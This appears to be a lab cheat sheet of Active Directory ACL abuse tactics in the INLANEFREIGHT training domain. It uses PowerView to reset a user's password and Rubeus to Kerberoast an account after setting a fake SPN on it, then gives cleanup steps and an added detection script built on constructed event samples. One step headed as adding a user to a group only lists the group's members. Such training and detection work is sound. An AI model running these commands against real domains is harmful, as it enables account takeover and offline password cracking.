ACL Abuse Tactics
Creating a PSCredential object
$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
Creating a SecureString object
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
Changing the user's password
cd C:\Tools\
Import-Module .\PowerView.ps1
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
Creating a SecureString object using damundsen
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
Adding damundsen to the Help Desk Level 1 group
Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members
Confirming that damundsen was added to the group
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
Creating a fake SPN
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /user:adunn /nowrap
Cleanup
Removing the fake SPN from adunn's account
Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose
Removing damundsen from the Help Desk Level 1 group
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose
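Detecting the SPN step
The fake-SPN and Kerberoasting steps above leave a recognizable pair of Security events on a domain controller. This added example is not part of the original page. It correlates a servicePrincipalName write (event 5136) with a service ticket request for the same account (event 4769) inside a time window. The sample records, the example.local names and the function name Find-SpnWriteThenTicket are constructed for illustration.

```powershell
# Added example. Sample records are constructed, not real logs; field names are
# modelled on Security events 5136 (directory object modified) and 4769
# (Kerberos service ticket requested).
$t0 = [datetime]'2024-01-01T10:00:00'
$SampleEvents = @(
    [pscustomobject]@{ Id = 5136; Time = $t0; SubjectUserName = 'damundsen'
        ObjectDN = 'CN=adunn,CN=Users,DC=example,DC=local'
        AttributeLDAPDisplayName = 'servicePrincipalName'
        AttributeValue = 'notahacker/LEGIT'; OperationType = 'Value Added' }
    [pscustomobject]@{ Id = 4769; Time = $t0.AddMinutes(2)
        TargetUserName = 'damundsen@EXAMPLE.LOCAL'
        ServiceName = 'adunn'; TicketEncryptionType = '0x17' }
    [pscustomobject]@{ Id = 4769; Time = $t0.AddMinutes(3)
        TargetUserName = 'jsmith@EXAMPLE.LOCAL'
        ServiceName = 'FILESRV01$'; TicketEncryptionType = '0x12' }
)

function Find-SpnWriteThenTicket {
    param([object[]]$Records, [int]$WindowMinutes = 30)
    # Step 1: every SPN value added to a directory object.
    $spnWrites = $Records | Where-Object {
        $_.Id -eq 5136 -and $_.AttributeLDAPDisplayName -eq 'servicePrincipalName' -and
        $_.OperationType -eq 'Value Added'
    }
    foreach ($w in $spnWrites) {
        # Assumption: the object's CN equals its sAMAccountName (true for the sample);
        # in production resolve ObjectDN through a directory lookup instead.
        if ($w.ObjectDN -match '^CN=([^,]+),') { $account = $Matches[1] } else { continue }
        $deadline = $w.Time.AddMinutes($WindowMinutes)
        # Step 2: service tickets requested for that account shortly after the write.
        $Records | Where-Object {
            $_.Id -eq 4769 -and $_.ServiceName -eq $account -and
            $_.Time -ge $w.Time -and $_.Time -le $deadline
        } | ForEach-Object {
            [pscustomobject]@{
                Account     = $account
                Spn         = $w.AttributeValue
                WrittenBy   = $w.SubjectUserName
                RequestedBy = $_.TargetUserName
                Rc4Ticket   = ($_.TicketEncryptionType -eq '0x17')  # 0x17 = RC4-HMAC
                DelaySec    = [int]($_.Time - $w.Time).TotalSeconds
            }
        }
    }
}

Find-SpnWriteThenTicket -Records $SampleEvents | Format-Table -AutoSize
```

Event 5136 is only written when Directory Service Changes auditing is enabled and the modified object has a matching audit entry, so confirm that before relying on this correlation.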